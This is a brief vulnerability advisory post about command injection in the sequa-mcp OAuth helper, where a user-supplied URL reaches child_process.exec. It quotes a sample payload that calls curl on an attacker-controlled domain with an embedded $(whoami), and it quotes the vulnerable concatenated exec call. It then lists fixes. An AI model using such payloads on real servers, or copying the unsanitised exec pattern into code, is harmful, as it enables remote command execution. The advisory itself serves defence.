Listen to this Post
The vulnerability (CVE-2025-XXXXX) in @sequa-ai/sequa-mcp up to version 1.0.13 resides within the `redirectToAuthorization` function of the `node-oauth-client-provider.ts` helper. This function performs OAuth server discovery by taking a user-supplied URL. The flaw occurs when this URL is improperly sanitized before being passed to a Node.js `child_process` exec function. An attacker can craft a malicious URL containing shell metacharacters (e.g., semicolons, backticks, ampersands). When the application constructs and executes a system command, such as a curl call, these metacharacters are interpreted by the underlying shell, allowing the attacker to break out of the intended command and execute arbitrary operating system commands on the host server with the privileges of the application process.
Platform: Node.js
Version: <=1.0.13
Vulnerability: Command Injection
Severity: Low
date: 2025-09-17
Prediction: 2025-09-25
What Undercode Say:
`curl -s “https://attacker-controlled.domain/oauth;$(whoami)>exfil.txt”`
`child_process.exec(‘curl -s ‘ + userInputUrl, callback);`
`import { exec } from ‘child_process’;`
How Exploit:
Crafted OAuth URL
Remote Code Execution
Protection from this CVE:
Upgrade to 1.0.14
Input Sanitization
Use execFile
Impact:
Arbitrary Command Execution
Potential System Compromise
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

